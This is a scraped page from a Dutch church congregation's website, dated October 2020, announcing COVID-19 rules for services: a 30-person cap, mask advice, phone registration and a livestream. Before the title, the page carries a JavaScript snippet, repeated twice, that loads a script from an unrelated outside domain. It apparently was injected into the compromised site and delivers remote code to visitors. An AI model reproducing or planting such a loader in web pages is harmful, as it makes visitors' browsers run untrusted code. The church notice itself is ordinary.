;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bij de diensten ... update ! - PKN Damwâld

Bij de diensten … update !

Gepubliceerd op: vrijdag 9 oktober 2020

Opnieuw moesten we deze week als moderamens van onze kerken bij elkaar komen vanwege een nieuw (dringend) advies van de landelijke kerk. Het werd veroorzaakt door alle commotie rondom
de beelden over de kerkgang in Staphorst (maar er waren meer plaatsen, waar de situatie in de kerken niet veel anders was).

Het nieuw advies houdt in: Het aantal kerkgangers per dienst wordt teruggebracht naar 30 (exclusief de medewerkenden). Het gebruik van mondkapjes wordt dringend geadviseerd bij het in- en het uitgaan van de kerk. We hebben overwogen of het niet verstandig zou zijn om weer geheel terug te keren naar de situatie van maart, maar omdat de opkomst in de diensten meer dan eens niet ver boven de 30 uitkwam, gaan we door met het verminderde aantal kerkgangers. Het mondkapjesadvies nemen we over.

Blij zijn we er niet mee, maar als kerken hebben we in deze tijd een voorbeeldfunctie. Als we ertoe kunnen bijdragen de toename van het aantal besmettingen tegen te gaan, moeten we dat doen. Het kan betekenen, dat we eerder moeten aangeven, dat de kerkdienst vol is, ook al is de kerkzaal het niet. Des te meer reden voor u, zich tijdig op te geven (tel. 06- 1475 1932 op donderdag of vrijdag tussen 19.00 en 20.00 uur). Gelukkig kunnen we de diensten ook meemaken via de livestream of via Kabel-Noord.

De kerkenraad wenst u goede diensten!